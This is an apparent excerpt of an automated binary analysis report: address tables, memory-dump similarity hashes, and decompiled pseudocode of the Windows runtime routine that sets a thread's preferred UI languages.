                                                                                  0x00000000
                                                                                  0x00ed2921
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2880
                                                                                  0x00ed2887
                                                                                  0x00ed288c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2805
                                                                                  0x00ed280a
                                                                                  0x00ed2814
                                                                                  0x00ed2816
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed281e
                                                                                  0x00ed2821
                                                                                  0x00ed2823
                                                                                  0x00000000
                                                                                  0x00ed2829
                                                                                  0x00ed2829
                                                                                  0x00ed2831
                                                                                  0x00ed283c
                                                                                  0x00ed283e
                                                                                  0x00000000
                                                                                  0x00ed283e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed284e
                                                                                  0x00ed2850
                                                                                  0x00ed2851
                                                                                  0x00ed2854
                                                                                  0x00ed2857
                                                                                  0x00ed285a
                                                                                  0x00ed285c
                                                                                  0x00ed285d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed275d
                                                                                  0x00ed2761
                                                                                  0x00000000
                                                                                  0x00ed2767
                                                                                  0x00ed276e
                                                                                  0x00ed2773
                                                                                  0x00ed2773
                                                                                  0x00ed2776
                                                                                  0x00ed2778
                                                                                  0x00ed277e
                                                                                  0x00ed277e
                                                                                  0x00ed2781
                                                                                  0x00ed2781
                                                                                  0x00ed2783
                                                                                  0x00ed2784
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f15bd8
                                                                                  0x00f15bde
                                                                                  0x00f15be4
                                                                                  0x00f15be6
                                                                                  0x00f15be8
                                                                                  0x00f15be9
                                                                                  0x00f15bee
                                                                                  0x00f15bf8
                                                                                  0x00f15bff
                                                                                  0x00f15c01
                                                                                  0x00f15c04
                                                                                  0x00f15c07
                                                                                  0x00f15c0b
                                                                                  0x00f15c0d
                                                                                  0x00f15c0d
                                                                                  0x00f15c15
                                                                                  0x00f15c18
                                                                                  0x00f15c1b
                                                                                  0x00f15c1b
                                                                                  0x00f15c1e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed28c3
                                                                                  0x00ed28c8
                                                                                  0x00ed28d2
                                                                                  0x00ed28d4
                                                                                  0x00ed28d8
                                                                                  0x00ed28db
                                                                                  0x00f15c26
                                                                                  0x00f15c28
                                                                                  0x00f15c2d
                                                                                  0x00f15c2d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f15c34
                                                                                  0x00f15c36
                                                                                  0x00f15c49
                                                                                  0x00f15c4e
                                                                                  0x00f15c54
                                                                                  0x00f15c5b
                                                                                  0x00f15c5d
                                                                                  0x00f15c60
                                                                                  0x00ed2788
                                                                                  0x00ed2788
                                                                                  0x00ed278b
                                                                                  0x00ed278e
                                                                                  0x00ed278e
                                                                                  0x00ed278e
                                                                                  0x00ed2791
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2756
                                                                                  0x00ed2750
                                                                                  0x00000000
                                                                                  0x00ed2794
                                                                                  0x00ed2794
                                                                                  0x00ed2795
                                                                                  0x00ed2798
                                                                                  0x00ed2798
                                                                                  0x00000000
                                                                                  0x00ed2734
                                                                                  0x00ed272c
                                                                                  0x00ed2700
                                                                                  0x00ed25ef
                                                                                  0x00ed25ef
                                                                                  0x00ed25ef
                                                                                  0x00ed25f2
                                                                                  0x00ed25f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed25fe
                                                                                  0x00000000
                                                                                  0x00ed28e6
                                                                                  0x00ed28ec
                                                                                  0x00ed28ef
                                                                                  0x00ed28f5
                                                                                  0x00ed28f8
                                                                                  0x00ed28f8
                                                                                  0x00000000
                                                                                  0x00ed28f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2866
                                                                                  0x00ed2866
                                                                                  0x00ed2876
                                                                                  0x00ed2879
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed27e0
                                                                                  0x00ed27e7
                                                                                  0x00ed27e9
                                                                                  0x00ed27eb
                                                                                  0x00f15afd
                                                                                  0x00000000
                                                                                  0x00f15afd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2633
                                                                                  0x00ed2638
                                                                                  0x00ed263b
                                                                                  0x00ed263c
                                                                                  0x00ed263e
                                                                                  0x00ed2640
                                                                                  0x00ed2642
                                                                                  0x00ed2647
                                                                                  0x00ed2649
                                                                                  0x00ed264e
                                                                                  0x00ed2650
                                                                                  0x00ed2653
                                                                                  0x00ed2659
                                                                                  0x00ed26a2
                                                                                  0x00ed26a7
                                                                                  0x00ed26ac
                                                                                  0x00ed26b2
                                                                                  0x00f15b11
                                                                                  0x00f15b15
                                                                                  0x00f15b17
                                                                                  0x00000000
                                                                                  0x00ed26b8
                                                                                  0x00ed26b8
                                                                                  0x00ed26ba
                                                                                  0x00ed27a6
                                                                                  0x00ed27a6
                                                                                  0x00ed27a9
                                                                                  0x00ed27ab
                                                                                  0x00ed27b9
                                                                                  0x00ed27b9
                                                                                  0x00ed27be
                                                                                  0x00ed27c1
                                                                                  0x00ed27c3
                                                                                  0x00ed27c5
                                                                                  0x00ed27c7
                                                                                  0x00f15c74
                                                                                  0x00f15c79
                                                                                  0x00f15c79
                                                                                  0x00ed27c7
                                                                                  0x00000000
                                                                                  0x00ed26c0
                                                                                  0x00ed26c0
                                                                                  0x00ed26c3
                                                                                  0x00ed26c6
                                                                                  0x00ed26c6
                                                                                  0x00ed26c9
                                                                                  0x00ed26c9
                                                                                  0x00000000
                                                                                  0x00ed26c9
                                                                                  0x00ed26ba
                                                                                  0x00ed265b
                                                                                  0x00ed265b
                                                                                  0x00ed265e
                                                                                  0x00ed2667
                                                                                  0x00ed266d
                                                                                  0x00ed2677
                                                                                  0x00ed267c
                                                                                  0x00ed267f
                                                                                  0x00ed2681
                                                                                  0x00f15b49
                                                                                  0x00f15b4e
                                                                                  0x00ed27cd
                                                                                  0x00ed27d0
                                                                                  0x00ed27d1
                                                                                  0x00ed27d2
                                                                                  0x00ed27d4
                                                                                  0x00ed27dd
                                                                                  0x00ed2687
                                                                                  0x00ed2687
                                                                                  0x00ed268a
                                                                                  0x00ed268b
                                                                                  0x00ed268e
                                                                                  0x00ed268f
                                                                                  0x00ed2691
                                                                                  0x00ed2696
                                                                                  0x00ed2698
                                                                                  0x00ed269d
                                                                                  0x00ed269f
                                                                                  0x00000000
                                                                                  0x00ed269f
                                                                                  0x00ed2681
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2846
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2605
                                                                                  0x00ed260a
                                                                                  0x00ed260c
                                                                                  0x00ed2611
                                                                                  0x00ed2616
                                                                                  0x00ed2619
                                                                                  0x00ed2619
                                                                                  0x00ed261e
                                                                                  0x00000000
                                                                                  0x00ed2624
                                                                                  0x00ed2627
                                                                                  0x00ed2627
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f15b1f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2894
                                                                                  0x00ed289b
                                                                                  0x00ed289d
                                                                                  0x00ed28a1
                                                                                  0x00f15b2b
                                                                                  0x00f15b2e
                                                                                  0x00f15b2e
                                                                                  0x00ed28a7
                                                                                  0x00ed28a9
                                                                                  0x00f15b04
                                                                                  0x00f15b09
                                                                                  0x00f15b09
                                                                                  0x00f15b09
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f15b35
                                                                                  0x00f15b3c
                                                                                  0x00ed28fb
                                                                                  0x00ed28fb
                                                                                  0x00ed26cc
                                                                                  0x00ed26cc
                                                                                  0x00ed26d0
                                                                                  0x00000000
                                                                                  0x00ed26d2
                                                                                  0x00ed26d2
                                                                                  0x00000000
                                                                                  0x00ed26d2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed25fe
                                                                                  0x00ed292d
                                                                                  0x00ed292f
                                                                                  0x00ed2930
                                                                                  0x00ed2935
                                                                                  0x00ed2937
                                                                                  0x00ed2938
                                                                                  0x00ed293b
                                                                                  0x00ed293c
                                                                                  0x00ed293e
                                                                                  0x00ed293f
                                                                                  0x00ed2940
                                                                                  0x00ed2942
                                                                                  0x00ed2944
                                                                                  0x00ed2947
                                                                                  0x00ed2948
                                                                                  0x00ed294e
                                                                                  0x00ed294f
                                                                                  0x00ed2950
                                                                                  0x00ed2957
                                                                                  0x00ed2958
                                                                                  0x00ed295c
                                                                                  0x00ed2962
                                                                                  0x00ed2963
                                                                                  0x00ed2964
                                                                                  0x00ed2968
                                                                                  0x00ed296b
                                                                                  0x00ed296c
                                                                                  0x00ed296f
                                                                                  0x00ed2972
                                                                                  0x00ed2973
                                                                                  0x00ed2974
                                                                                  0x00ed297b
                                                                                  0x00ed297e
                                                                                  0x00ed297f
                                                                                  0x00ed2980
                                                                                  0x00ed2981
                                                                                  0x00ed2982
                                                                                  0x00ed2983
                                                                                  0x00ed2984
                                                                                  0x00ed2985
                                                                                  0x00ed2986
                                                                                  0x00ed2987
                                                                                  0x00ed2988
                                                                                  0x00ed2989
                                                                                  0x00ed298a
                                                                                  0x00ed298b
                                                                                  0x00ed298c
                                                                                  0x00ed298d
                                                                                  0x00ed298e
                                                                                  0x00ed298f
                                                                                  0x00ed2990
                                                                                  0x00ed2992
                                                                                  0x00ed2997
                                                                                  0x00ed29a3
                                                                                  0x00ed29a6
                                                                                  0x00ed29ab
                                                                                  0x00ed29ad
                                                                                  0x00ed29b0
                                                                                  0x00ed29b2
                                                                                  0x00f15c80
                                                                                  0x00ed29b8
                                                                                  0x00ed29b8
                                                                                  0x00ed29bb
                                                                                  0x00ed29c0
                                                                                  0x00ed29c5
                                                                                  0x00ed29c6
                                                                                  0x00ed29c6
                                                                                  0x00ed29c9
                                                                                  0x00ed29cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed29cd
                                                                                  0x00ed29d0
                                                                                  0x00ed29d9
                                                                                  0x00ed29db
                                                                                  0x00ed29dd
                                                                                  0x00ed2a7f
                                                                                  0x00ed2a84
                                                                                  0x00ed2a87
                                                                                  0x00ed2a89
                                                                                  0x00f15ca1
                                                                                  0x00f15ca3
                                                                                  0x00000000
                                                                                  0x00ed2a8f
                                                                                  0x00ed2a8f
                                                                                  0x00000000
                                                                                  0x00ed2a8f
                                                                                  0x00000000
                                                                                  0x00ed29e3
                                                                                  0x00ed29e3
                                                                                  0x00ed29e3
                                                                                  0x00000000
                                                                                  0x00ed29e3
                                                                                  0x00ed29dd
                                                                                  0x00000000
                                                                                  0x00ed29db
                                                                                  0x00ed29e6
                                                                                  0x00ed29e9
                                                                                  0x00ed29eb
                                                                                  0x00ed29ed
                                                                                  0x00ed29f3
                                                                                  0x00ed29f5
                                                                                  0x00ed29f8
                                                                                  0x00ed29fa
                                                                                  0x00ed2a97
                                                                                  0x00ed2a9a
                                                                                  0x00ed2a9d
                                                                                  0x00ed2add
                                                                                  0x00000000
                                                                                  0x00ed2a9f
                                                                                  0x00ed2aa2
                                                                                  0x00ed2aa5
                                                                                  0x00ed2aa8
                                                                                  0x00ed2aab
                                                                                  0x00f15cab
                                                                                  0x00f15caf
                                                                                  0x00f15cc5
                                                                                  0x00f15cda
                                                                                  0x00f15cdc
                                                                                  0x00f15cdf
                                                                                  0x00f15ce5
                                                                                  0x00000000
                                                                                  0x00f15ceb
                                                                                  0x00f15ced
                                                                                  0x00f15cee
                                                                                  0x00000000
                                                                                  0x00f15cee
                                                                                  0x00f15cb1
                                                                                  0x00f15cb4
                                                                                  0x00f15cb9
                                                                                  0x00f15cbb
                                                                                  0x00000000
                                                                                  0x00f15cbd
                                                                                  0x00f15cbd
                                                                                  0x00000000
                                                                                  0x00f15cbd
                                                                                  0x00f15cbb
                                                                                  0x00ed2ab1
                                                                                  0x00ed2ab1
                                                                                  0x00ed2ac4
                                                                                  0x00ed2ac6
                                                                                  0x00ed2ac6
                                                                                  0x00000000
                                                                                  0x00ed2ac6
                                                                                  0x00ed2aab
                                                                                  0x00000000
                                                                                  0x00ed2a00
                                                                                  0x00ed2a09
                                                                                  0x00ed2a0e
                                                                                  0x00ed2a21
                                                                                  0x00ed2a24
                                                                                  0x00ed2a35
                                                                                  0x00ed2a3a
                                                                                  0x00ed2a3d
                                                                                  0x00ed2a42
                                                                                  0x00ed2a59
                                                                                  0x00ed2a59
                                                                                  0x00ed2a5c
                                                                                  0x00ed2a5f
                                                                                  0x00ed2a5f
                                                                                  0x00ed29fa
                                                                                  0x00ed29f3
                                                                                  0x00ed2a64
                                                                                  0x00ed2a64
                                                                                  0x00ed2a6b
                                                                                  0x00ed2a6b
                                                                                  0x00ed2a6d
                                                                                  0x00ed2a72
                                                                                  0x00ed2a72
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PATH
                                                                                  • API String ID: 0-1036084923
                                                                                  • Opcode ID: 474b7de2657b3cf1143a8d686520e490e795898547b3154f57fd6443d8d963b8
                                                                                  • Instruction ID: 04370afe46a67ceff0626a96290209f548bf532b78d58c847b73c0d216039992
                                                                                  • Opcode Fuzzy Hash: 474b7de2657b3cf1143a8d686520e490e795898547b3154f57fd6443d8d963b8
                                                                                  • Instruction Fuzzy Hash: E1C18B71E00219DBCB25DFA9D891AEEB7B1FF98700F14502EEA11BB350D735A942DB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E00EDFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                  				char _v5;
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				char _v16;
                                                                                  				char _v17;
                                                                                  				char _v20;
                                                                                  				signed int _v24;
                                                                                  				char _v28;
                                                                                  				char _v32;
                                                                                  				signed int _v40;
                                                                                  				void* __ecx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				signed int _t73;
                                                                                  				intOrPtr* _t75;
                                                                                  				signed int _t77;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				intOrPtr _t85;
                                                                                  				intOrPtr _t86;
                                                                                  				signed int _t91;
                                                                                  				signed int _t94;
                                                                                  				signed int _t95;
                                                                                  				signed int _t96;
                                                                                  				signed int _t106;
                                                                                  				signed int _t108;
                                                                                  				signed int _t114;
                                                                                  				signed int _t116;
                                                                                  				signed int _t118;
                                                                                  				signed int _t122;
                                                                                  				signed int _t123;
                                                                                  				void* _t129;
                                                                                  				signed int _t130;
                                                                                  				void* _t132;
                                                                                  				intOrPtr* _t134;
                                                                                  				signed int _t138;
                                                                                  				signed int _t141;
                                                                                  				signed int _t147;
                                                                                  				intOrPtr _t153;
                                                                                  				signed int _t154;
                                                                                  				signed int _t155;
                                                                                  				signed int _t170;
                                                                                  				void* _t174;
                                                                                  				signed int _t176;
                                                                                  				signed int _t177;
                                                                                  
                                                                                  				_t129 = __ebx;
                                                                                  				_push(_t132);
                                                                                  				_push(__esi);
                                                                                  				_t174 = _t132;
                                                                                  				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                  				if(_t73 >= 0) {
                                                                                  					L5:
                                                                                  					return _t73;
                                                                                  				} else {
                                                                                  					E00EBEEF0(0xf97b60);
                                                                                  					_t134 =  *0xf97b84; // 0x77ad7b80
                                                                                  					_t2 = _t174 + 0x24; // 0x24
                                                                                  					_t75 = _t2;
                                                                                  					if( *_t134 != 0xf97b80) {
                                                                                  						_push(3);
                                                                                  						asm("int 0x29");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						_push(0xf97b60);
                                                                                  						_t170 = _v8;
                                                                                  						_v28 = 0;
                                                                                  						_v40 = 0;
                                                                                  						_v24 = 0;
                                                                                  						_v17 = 0;
                                                                                  						_v32 = 0;
                                                                                  						__eflags = _t170 & 0xffff7cf2;
                                                                                  						if((_t170 & 0xffff7cf2) != 0) {
                                                                                  							L43:
                                                                                  							_t77 = 0xc000000d;
                                                                                  						} else {
                                                                                  							_t79 = _t170 & 0x0000000c;
                                                                                  							__eflags = _t79;
                                                                                  							if(_t79 != 0) {
                                                                                  								__eflags = _t79 - 0xc;
                                                                                  								if(_t79 == 0xc) {
                                                                                  									goto L43;
                                                                                  								} else {
                                                                                  									goto L9;
                                                                                  								}
                                                                                  							} else {
                                                                                  								_t170 = _t170 | 0x00000008;
                                                                                  								__eflags = _t170;
                                                                                  								L9:
                                                                                  								_t81 = _t170 & 0x00000300;
                                                                                  								__eflags = _t81 - 0x300;
                                                                                  								if(_t81 == 0x300) {
                                                                                  									goto L43;
                                                                                  								} else {
                                                                                  									_t138 = _t170 & 0x00000001;
                                                                                  									__eflags = _t138;
                                                                                  									_v24 = _t138;
                                                                                  									if(_t138 != 0) {
                                                                                  										__eflags = _t81;
                                                                                  										if(_t81 != 0) {
                                                                                  											goto L43;
                                                                                  										} else {
                                                                                  											goto L11;
                                                                                  										}
                                                                                  									} else {
                                                                                  										L11:
                                                                                  										_push(_t129);
                                                                                  										_t77 = E00EB6D90( &_v20);
                                                                                  										_t130 = _t77;
                                                                                  										__eflags = _t130;
                                                                                  										if(_t130 >= 0) {
                                                                                  											_push(_t174);
                                                                                  											__eflags = _t170 & 0x00000301;
                                                                                  											if((_t170 & 0x00000301) == 0) {
                                                                                  												_t176 = _a8;
                                                                                  												__eflags = _t176;
                                                                                  												if(__eflags == 0) {
                                                                                  													L64:
                                                                                  													_t83 =  *[fs:0x18];
                                                                                  													_t177 = 0;
                                                                                  													__eflags =  *(_t83 + 0xfb8);
                                                                                  													if( *(_t83 + 0xfb8) != 0) {
                                                                                  														E00EB76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                  														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                  													}
                                                                                  													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                  													goto L15;
                                                                                  												} else {
                                                                                  													asm("sbb edx, edx");
                                                                                  													_t114 = E00F48938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                  													__eflags = _t114;
                                                                                  													if(_t114 < 0) {
                                                                                  														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                  														E00EAB150();
                                                                                  													}
                                                                                  													_t116 = E00F46D81(_t176,  &_v16);
                                                                                  													__eflags = _t116;
                                                                                  													if(_t116 >= 0) {
                                                                                  														__eflags = _v16 - 2;
                                                                                  														if(_v16 < 2) {
                                                                                  															L56:
                                                                                  															_t118 = E00EB75CE(_v20, 5, 0);
                                                                                  															__eflags = _t118;
                                                                                  															if(_t118 < 0) {
                                                                                  																L67:
                                                                                  																_t130 = 0xc0000017;
                                                                                  																goto L32;
                                                                                  															} else {
                                                                                  																__eflags = _v12;
                                                                                  																if(_v12 == 0) {
                                                                                  																	goto L67;
                                                                                  																} else {
                                                                                  																	_t153 =  *0xf98638; // 0x0
                                                                                  																	_t122 = L00EB38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                  																	_t154 = _v12;
                                                                                  																	_t130 = _t122;
                                                                                  																	__eflags = _t130;
                                                                                  																	if(_t130 >= 0) {
                                                                                  																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                  																		__eflags = _t123;
                                                                                  																		if(_t123 != 0) {
                                                                                  																			_t155 = _a12;
                                                                                  																			__eflags = _t155;
                                                                                  																			if(_t155 != 0) {
                                                                                  																				 *_t155 = _t123;
                                                                                  																			}
                                                                                  																			goto L64;
                                                                                  																		} else {
                                                                                  																			E00EB76E2(_t154);
                                                                                  																			goto L41;
                                                                                  																		}
                                                                                  																	} else {
                                                                                  																		E00EB76E2(_t154);
                                                                                  																		_t177 = 0;
                                                                                  																		goto L18;
                                                                                  																	}
                                                                                  																}
                                                                                  															}
                                                                                  														} else {
                                                                                  															__eflags =  *_t176;
                                                                                  															if( *_t176 != 0) {
                                                                                  																goto L56;
                                                                                  															} else {
                                                                                  																__eflags =  *(_t176 + 2);
                                                                                  																if( *(_t176 + 2) == 0) {
                                                                                  																	goto L64;
                                                                                  																} else {
                                                                                  																	goto L56;
                                                                                  																}
                                                                                  															}
                                                                                  														}
                                                                                  													} else {
                                                                                  														_t130 = 0xc000000d;
                                                                                  														goto L32;
                                                                                  													}
                                                                                  												}
                                                                                  												goto L35;
                                                                                  											} else {
                                                                                  												__eflags = _a8;
                                                                                  												if(_a8 != 0) {
                                                                                  													_t77 = 0xc000000d;
                                                                                  												} else {
                                                                                  													_v5 = 1;
                                                                                  													L00EDFCE3(_v20, _t170);
                                                                                  													_t177 = 0;
                                                                                  													__eflags = 0;
                                                                                  													L15:
                                                                                  													_t85 =  *[fs:0x18];
                                                                                  													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                  													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                  														L18:
                                                                                  														__eflags = _t130;
                                                                                  														if(_t130 != 0) {
                                                                                  															goto L32;
                                                                                  														} else {
                                                                                  															__eflags = _v5 - _t130;
                                                                                  															if(_v5 == _t130) {
                                                                                  																goto L32;
                                                                                  															} else {
                                                                                  																_t86 =  *[fs:0x18];
                                                                                  																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                  																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                  																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                  																}
                                                                                  																__eflags = _t177;
                                                                                  																if(_t177 == 0) {
                                                                                  																	L31:
                                                                                  																	__eflags = 0;
                                                                                  																	L00EB70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                  																	goto L32;
                                                                                  																} else {
                                                                                  																	__eflags = _v24;
                                                                                  																	_t91 =  *(_t177 + 0x20);
                                                                                  																	if(_v24 != 0) {
                                                                                  																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                  																		goto L31;
                                                                                  																	} else {
                                                                                  																		_t141 = _t91 & 0x00000040;
                                                                                  																		__eflags = _t170 & 0x00000100;
                                                                                  																		if((_t170 & 0x00000100) == 0) {
                                                                                  																			__eflags = _t141;
                                                                                  																			if(_t141 == 0) {
                                                                                  																				L74:
                                                                                  																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                  																				goto L27;
                                                                                  																			} else {
                                                                                  																				_t177 = E00EDFD22(_t177);
                                                                                  																				__eflags = _t177;
                                                                                  																				if(_t177 == 0) {
                                                                                  																					goto L42;
                                                                                  																				} else {
                                                                                  																					_t130 = E00EDFD9B(_t177, 0, 4);
                                                                                  																					__eflags = _t130;
                                                                                  																					if(_t130 != 0) {
                                                                                  																						goto L42;
                                                                                  																					} else {
                                                                                  																						_t68 = _t177 + 0x20;
                                                                                  																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                  																						__eflags =  *_t68;
                                                                                  																						_t91 =  *(_t177 + 0x20);
                                                                                  																						goto L74;
                                                                                  																					}
                                                                                  																				}
                                                                                  																			}
                                                                                  																			goto L35;
                                                                                  																		} else {
                                                                                  																			__eflags = _t141;
                                                                                  																			if(_t141 != 0) {
                                                                                  																				_t177 = E00EDFD22(_t177);
                                                                                  																				__eflags = _t177;
                                                                                  																				if(_t177 == 0) {
                                                                                  																					L42:
                                                                                  																					_t77 = 0xc0000001;
                                                                                  																					goto L33;
                                                                                  																				} else {
                                                                                  																					_t130 = E00EDFD9B(_t177, 0, 4);
                                                                                  																					__eflags = _t130;
                                                                                  																					if(_t130 != 0) {
                                                                                  																						goto L42;
                                                                                  																					} else {
                                                                                  																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                  																						_t91 =  *(_t177 + 0x20);
                                                                                  																						goto L26;
                                                                                  																					}
                                                                                  																				}
                                                                                  																				goto L35;
                                                                                  																			} else {
                                                                                  																				L26:
                                                                                  																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                  																				__eflags = _t94;
                                                                                  																				L27:
                                                                                  																				 *(_t177 + 0x20) = _t94;
                                                                                  																				__eflags = _t170 & 0x00008000;
                                                                                  																				if((_t170 & 0x00008000) != 0) {
                                                                                  																					_t95 = _a12;
                                                                                  																					__eflags = _t95;
                                                                                  																					if(_t95 != 0) {
                                                                                  																						_t96 =  *_t95;
                                                                                  																						__eflags = _t96;
                                                                                  																						if(_t96 != 0) {
                                                                                  																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                  																							_t40 = _t177 + 0x20;
                                                                                  																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                  																							__eflags =  *_t40;
                                                                                  																						}
                                                                                  																					}
                                                                                  																				}
                                                                                  																				goto L31;
                                                                                  																			}
                                                                                  																		}
                                                                                  																	}
                                                                                  																}
                                                                                  															}
                                                                                  														}
                                                                                  													} else {
                                                                                  														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                  														_t106 =  *(_t147 + 0x20);
                                                                                  														__eflags = _t106 & 0x00000040;
                                                                                  														if((_t106 & 0x00000040) != 0) {
                                                                                  															_t147 = E00EDFD22(_t147);
                                                                                  															__eflags = _t147;
                                                                                  															if(_t147 == 0) {
                                                                                  																L41:
                                                                                  																_t130 = 0xc0000001;
                                                                                  																L32:
                                                                                  																_t77 = _t130;
                                                                                  																goto L33;
                                                                                  															} else {
                                                                                  																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                  																_t106 =  *(_t147 + 0x20);
                                                                                  																goto L17;
                                                                                  															}
                                                                                  															goto L35;
                                                                                  														} else {
                                                                                  															L17:
                                                                                  															_t108 = _t106 | 0x00000080;
                                                                                  															__eflags = _t108;
                                                                                  															 *(_t147 + 0x20) = _t108;
                                                                                  															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                  															goto L18;
                                                                                  														}
                                                                                  													}
                                                                                  												}
                                                                                  											}
                                                                                  											L33:
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						L35:
                                                                                  						return _t77;
                                                                                  					} else {
                                                                                  						 *_t75 = 0xf97b80;
                                                                                  						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                  						 *_t134 = _t75;
                                                                                  						 *0xf97b84 = _t75;
                                                                                  						_t73 = E00EBEB70(_t134, 0xf97b60);
                                                                                  						if( *0xf97b20 != 0) {
                                                                                  							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                  							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                  								_t73 = E00EBFF60( *0xf97b20);
                                                                                  							}
                                                                                  						}
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  			}

















































                                                                                  0x00edfab0
                                                                                  0x00edfab2
                                                                                  0x00edfab3
                                                                                  0x00edfab4
                                                                                  0x00edfabc
                                                                                  0x00edfac0
                                                                                  0x00edfb14
                                                                                  0x00edfb17
                                                                                  0x00edfac2
                                                                                  0x00edfac8
                                                                                  0x00edfacd
                                                                                  0x00edfad3
                                                                                  0x00edfad3
                                                                                  0x00edfadd
                                                                                  0x00edfb18
                                                                                  0x00edfb1b
                                                                                  0x00edfb1d
                                                                                  0x00edfb1e
                                                                                  0x00edfb1f
                                                                                  0x00edfb20
                                                                                  0x00edfb21
                                                                                  0x00edfb22
                                                                                  0x00edfb23
                                                                                  0x00edfb24
                                                                                  0x00edfb25
                                                                                  0x00edfb26
                                                                                  0x00edfb27
                                                                                  0x00edfb28
                                                                                  0x00edfb29
                                                                                  0x00edfb2a
                                                                                  0x00edfb2b
                                                                                  0x00edfb2c
                                                                                  0x00edfb2d
                                                                                  0x00edfb2e
                                                                                  0x00edfb2f
                                                                                  0x00edfb3a
                                                                                  0x00edfb3b
                                                                                  0x00edfb3e
                                                                                  0x00edfb41
                                                                                  0x00edfb44
                                                                                  0x00edfb47
                                                                                  0x00edfb4a
                                                                                  0x00edfb4d
                                                                                  0x00edfb53
                                                                                  0x00f1bdcb
                                                                                  0x00f1bdcb
                                                                                  0x00edfb59
                                                                                  0x00edfb5b
                                                                                  0x00edfb5b
                                                                                  0x00edfb5e
                                                                                  0x00f1bdd5
                                                                                  0x00f1bdd8
                                                                                  0x00000000
                                                                                  0x00f1bdda
                                                                                  0x00000000
                                                                                  0x00f1bdda
                                                                                  0x00edfb64
                                                                                  0x00edfb64
                                                                                  0x00edfb64
                                                                                  0x00edfb67
                                                                                  0x00edfb6e
                                                                                  0x00edfb70
                                                                                  0x00edfb72
                                                                                  0x00000000
                                                                                  0x00edfb78
                                                                                  0x00edfb7a
                                                                                  0x00edfb7a
                                                                                  0x00edfb7d
                                                                                  0x00edfb80
                                                                                  0x00f1bddf
                                                                                  0x00f1bde1
                                                                                  0x00000000
                                                                                  0x00f1bde3
                                                                                  0x00000000
                                                                                  0x00f1bde3
                                                                                  0x00edfb86
                                                                                  0x00edfb86
                                                                                  0x00edfb86
                                                                                  0x00edfb8b
                                                                                  0x00edfb90
